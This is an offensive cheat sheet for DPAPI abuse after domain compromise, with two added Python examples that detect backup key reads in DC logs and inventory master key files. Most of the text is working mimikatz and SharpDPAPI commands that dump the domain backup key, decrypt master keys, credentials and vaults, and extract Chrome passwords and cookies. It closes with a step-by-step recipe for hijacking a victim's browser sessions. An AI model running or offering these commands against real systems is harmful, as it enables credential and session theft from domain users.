DPAPI

In a domain admin post-exploitation scenario, dump the domain backup key first, then decrypt whatever you need by adding the option /pvk:key.pvk to the SharpDPAPI commands below

Retrieve domain backup key

lsadump::backupkeys /system:<DC> /export

By default this queries the current DC and prints the key as base64

SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]
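Both commands above read the backup key from LSA over the network, which a domain controller audits. The following script is an added example (not from the original cheat sheet or from the mimikatz/SharpDPAPI projects) showing the detection logic a defender would run over the DC's Security log: event 4662 with ObjectType SecretObject and an ObjectName containing BCKUPKEY, plus event 4693 (recovery of a DPAPI master key through the DC). The event records are constructed samples, and the exact EventData field names and ObjectName format are assumptions to be checked against real events in your environment.

```python
"""
Added example: flag the audit trail that DPAPI domain backup key retrieval
leaves on a domain controller. Sample events below are constructed, not real.

Signals checked:
  * 4662, ObjectType 'SecretObject', ObjectName containing 'BCKUPKEY', with
    AccessMask bit 0x2 set (the secret value was read, not just enumerated).
    Requires 'Audit Directory Service Access' on the DC.
  * 4693 'Recovery of data protection master key was attempted', emitted when
    a master key is recovered via the DC's BackupKey service. Requires the
    'DPAPI Activity' audit subcategory.
"""
import re
from typing import Dict, List, Optional

Event = Dict[str, str]
BACKUPKEY_SECRET = re.compile(r"BCKUPKEY", re.IGNORECASE)


def classify_event(event: Event) -> Optional[str]:
    """Return a rule name if the event is a DPAPI backup key signal, else None."""
    eid = event.get("EventID")
    if eid == "4662":
        if event.get("ObjectType") != "SecretObject":
            return None
        if not BACKUPKEY_SECRET.search(event.get("ObjectName", "")):
            return None
        # 0x2 is SECRET_QUERY_VALUE: the caller actually read the secret.
        mask = int(event.get("AccessMask", "0x0"), 16)
        return "dpapi_domain_backupkey_read" if mask & 0x2 else None
    if eid == "4693":
        return "dpapi_masterkey_recovery_via_dc"
    return None


def find_alerts(events: List[Event]) -> List[Dict[str, str]]:
    """Run classify_event over a batch and collect the matches with context."""
    alerts = []
    for ev in events:
        rule = classify_event(ev)
        if rule:
            alerts.append({
                "rule": rule,
                "computer": ev.get("Computer", ""),
                "account": ev.get("SubjectUserName", ""),
                "detail": ev.get("ObjectName") or ev.get("RecoveryServer", ""),
            })
    return alerts


# Constructed sample events (field names assumed to follow the Security log's EventData).
SAMPLE_EVENTS: List[Event] = [
    # backup key secret read on the DC: should fire
    {"EventID": "4662", "Computer": "DC01.corp.example", "SubjectUserName": "jdoe",
     "ObjectType": "SecretObject", "ObjectName": "Policy\\Secrets\\G$BCKUPKEY_PREFERRED",
     "AccessMask": "0x2"},
    # ordinary directory object access: must not fire
    {"EventID": "4662", "Computer": "DC01.corp.example", "SubjectUserName": "svc_backup",
     "ObjectType": "%{bf967a86-0de6-11d0-a285-00aa003049e2}",
     "ObjectName": "CN=Computers,DC=corp,DC=example", "AccessMask": "0x10"},
    # master key recovered through the DC: should fire
    {"EventID": "4693", "Computer": "DC01.corp.example", "SubjectUserName": "jdoe",
     "RecoveryServer": "DC01.corp.example",
     "MasterKeyId": "{3e9c1a2b-5f6d-4a7e-9b8c-0d1e2f3a4b5c}"},
    # unrelated logon event: must not fire
    {"EventID": "4624", "Computer": "DC01.corp.example", "SubjectUserName": "jdoe",
     "LogonType": "3"},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

Legitimate readers of the backup key secret are rare (essentially the DC's own LSA and an administrator running a key rotation), so a single match from an interactive or non-DC account is worth investigating rather than tuning out.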

DPAPI blob decryption

mimikatz dpapi::blob /in:c:\..\<blob_file> /masterkey:<masterkey>

Retrieve GUID

dir /a C:\Users\<username>\AppData\Roaming\Microsoft\Credentials
dir /a C:\Users\<username>\AppData\Local\Microsoft\Credentials

Extract masterkey

Retrieve SHA1 representation of the Masterkey

privilege::debug
!sekurlsa::dpapi
!dpapi::cache

Decrypt offline user’s masterkey

Keys location C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user-SID>\<KEY_GUIDs>

dpapi::masterkey /in:<MASTERKEY_LOCATION> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected
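Every file under the Protect\<user-SID> folder is a master key file, and whether the domain backup key can recover it depends on whether the file carries a DomainKey section. The parser below is an added example (not from the original cheat sheet or from mimikatz) that reads only the fixed 128-byte header and the section lengths, following the field layout mimikatz documents for its KULL_M_DPAPI_MASTERKEYS structure, so a defender can inventory which keys on a host are escrowed to the DC. The sample files are constructed here with zeroed placeholder key material; their GUIDs, paths and algorithm constants are assumptions, and nothing is decrypted.

```python
"""
Added example: inventory DPAPI master key files by parsing their header and
reporting which ones contain a DomainKey section (recoverable with the domain
backup key). Sample files are constructed with placeholder key material.
"""
import struct
import uuid
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Little-endian header: version, 8 reserved bytes, GUID as 36 UTF-16LE chars
# (72 bytes), 8 reserved bytes, flags, then the 64-bit lengths of the
# MasterKey, BackupKey, CredHist and DomainKey sections that follow in order.
HEADER = struct.Struct("<I8s72s8sIQQQQ")
assert HEADER.size == 128


@dataclass
class MasterKeyFile:
    version: int
    guid: str
    flags: int
    masterkey_len: int
    backupkey_len: int
    credhist_len: int
    domainkey_len: int

    @property
    def domain_backed(self) -> bool:
        # A non-empty DomainKey section means the key was escrowed to the DC:
        # whoever holds the domain backup private key can recover it offline.
        return self.domainkey_len > 0


def parse_masterkey_file(data: bytes) -> MasterKeyFile:
    """Parse the header and validate that the declared sections fit the file."""
    if len(data) < HEADER.size:
        raise ValueError("file shorter than the master key header")
    version, _r0, guid_raw, _r1, flags, mk, bk, ch, dk = HEADER.unpack_from(data, 0)
    guid = guid_raw.decode("utf-16-le")
    uuid.UUID(guid)  # raises ValueError if the header GUID is malformed
    if len(data) < HEADER.size + mk + bk + ch + dk:
        raise ValueError("file truncated: section lengths exceed file size")
    return MasterKeyFile(version, guid, flags, mk, bk, ch, dk)


def inventory(files: Dict[str, bytes]) -> List[Tuple[str, str, bool]]:
    """Return (path, guid, domain_backed) for each master key file."""
    return [(path, mk.guid, mk.domain_backed)
            for path, mk in ((p, parse_masterkey_file(b)) for p, b in files.items())]


def build_sample(guid: str, domain_backed: bool) -> bytes:
    """Constructed sample file: real section layout, zeroed key material."""
    # MasterKey section: version, 16-byte salt, PBKDF2 rounds, hash alg, cipher alg, ciphertext.
    # 0x800e = CALG_SHA_512, 0x6610 = CALG_AES_256 (assumed typical values).
    mk_section = struct.pack("<I16sIII", 2, b"\x11" * 16, 8000, 0x800E, 0x6610) + b"\x00" * 64
    dk_section = b""
    if domain_backed:
        # DomainKey section: version, secret length, access-check length,
        # GUID of the domain backup key used, then secret and access check.
        secret, check = b"\x00" * 256, b"\x00" * 64
        backup_key_guid = uuid.UUID("0b1c2d3e-4f50-4617-8293-a4b5c6d7e8f9").bytes_le
        dk_section = struct.pack("<III16s", 2, len(secret), len(check), backup_key_guid) + secret + check
    header = HEADER.pack(2, b"\x00" * 8, guid.encode("utf-16-le"), b"\x00" * 8, 0,
                         len(mk_section), 0, 0, len(dk_section))
    return header + mk_section + dk_section


# Constructed inventory: one domain-backed key, one purely local key.
DOMAIN_GUID = "3e9c1a2b-5f6d-4a7e-9b8c-0d1e2f3a4b5c"
LOCAL_GUID = "7f0e1d2c-3b4a-4958-8776-655443322110"
PROTECT_DIR = r"C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-1-2-3-1001"
SAMPLES: Dict[str, bytes] = {
    PROTECT_DIR + "\\" + DOMAIN_GUID: build_sample(DOMAIN_GUID, True),
    PROTECT_DIR + "\\" + LOCAL_GUID: build_sample(LOCAL_GUID, False),
}

if __name__ == "__main__":
    for path, guid, backed in inventory(SAMPLES):
        print(f"{guid}  domain_backed={backed}  {path}")
```

On a real host, replace SAMPLES with the bytes of each file in the Protect folder; a domain-joined user's keys will normally all report domain_backed=True, which is exactly why rotating the domain backup key does not help after it has leaked: the escrowed copies in existing files still use the old key.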

Extract user machine credentials and vaults

SharpDPAPI.exe machinetriage

Decrypt machine masterkey

dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\<GUID> /system:DPAPI_SYSTEM
SharpDPAPI.exe machinemasterkeys

Decrypt machine vault

SharpDPAPI.exe machinevaults

Extract user credentials, vault and rdg

SharpDPAPI.exe triage

SharpDPAPI

Extract credentials

SharpDPAPI.exe credentials [{GUID1}:SHA1 {GUID2}:SHA1 ...]

Can also be run remotely

SharpDPAPI.exe credentials /pvk:<BASE64_backup_key> [/server:<server.fqdn_domain>]

Extract vaults

SharpDPAPI.exe vaults [{GUID1}:SHA1 {GUID2}:SHA1 ...]

Can also be run remotely

SharpDPAPI.exe vaults /pvk:<BASE64_backup_key> [/server:<server.fqdn_domain>]

Mimikatz

Step 1 - Masterkey dump (you do not know the user’s password)

mimikatz dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /rpc

Step 1 - Masterkey dump (you know the user’s password)

mimikatz dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /sid:<user_sid> /password:<password> /protected

Step 2 - Data decryption

mimikatz dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<masterkey>

Google Chrome

SharpChrome

SharpChrome.exe <logins | cookies> /pvk:<key.pvk | BASE64> /format:table [/showall] [/server:<target>]

Mimikatz

If the user’s context cannot be obtained, see the other scenarios at https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/

mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data"
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Cookies" /unprotect

Stealing Domain Users’ sessions

Step 1 - Download the whole Chrome folder

C:\Users\<victim>\AppData\Local\Google\Chrome\User Data\

Step 2 - Download all the cred files in this folder

C:\users\<victim>\appdata\Roaming\Microsoft\Protect\<victim_SID>

Step 3 - On your local machine in your mimikatz folder copy the masterkey

xcopy /H <victim_SID>\<cred_file>

Step 4 - Decrypt the user’s keys from Mimikatz

dpapi::masterkey /in:<cred_file> /pvk:<domain_backup_key.pvk>

Step 5 - Put the victim’s key in memory on your local machine

dpapi::create /guid:{<szGuid>} /key:<private_key> /password:<local user's password> /protected
del /a <cred_file>

Step 6 - Copy the file on your local machine

xcopy /H <Mimikatz_folder>\<cred_file> C:\Users\<local_user>\AppData\Roaming\Microsoft\Protect\<local user's SID>\

Step 7 - Open Google Chrome and enjoy!